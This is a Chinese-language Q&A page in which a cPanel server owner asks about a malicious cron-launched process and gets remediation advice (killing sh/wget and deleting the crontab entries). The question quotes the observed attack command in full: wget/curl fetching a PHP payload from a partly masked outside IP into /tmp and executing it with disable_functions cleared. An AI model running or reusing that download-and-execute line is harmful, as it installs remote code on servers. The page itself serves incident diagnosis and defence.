防止Cron中恶意执行

问题描述 投票:0回答:1

我使用 cPanel 和 apache。 我在我的服务器中看到这个过程:

opt/cpanel/ea-php74/root/usr/bin/php -d disable_functions= /tmp/codeItems3
root     17549  0.0  0.0  27180   972 ?        Ss   Apr16   0:00 jailshell (amolnxxx) [17581] ll -c sleep 3; ( wget --compression=gzip -O/tmp/codeItems3 http://45.140.X.x/start.php?v=1  curl -s --compressed --max-time 30 http://45.140.X.X/start.php?v=1 > /tmp/codeItems3 ) && ( /usr/local/bin/php -d disable_functions="" /tmp/codeItems3  /usr/bin/php -d disable_functions="" /tmp/codeItems3 || php -d disable_functions="" /tmp/codeItems3 )

问题是什么?我该如何阻止它?

php cron cpanel code-injection
1个回答
0
投票

我们在自己的服务器上看到了类似的情况,发现大多数进程都是“sh”或“wget”请求,这些请求是通过用户 cron 执行的。

您可以执行以下操作...

killall -9 sh wget 

然后,要删除 cPanel 用户的 crontab 条目,请运行...

sed -i "/codeItem/d" /var/spool/cron/*

这应该杀死所有正在运行的进程,并且还将删除执行它们的 crontab 条目。

© www.soinside.com 2019 - 2024. All rights reserved.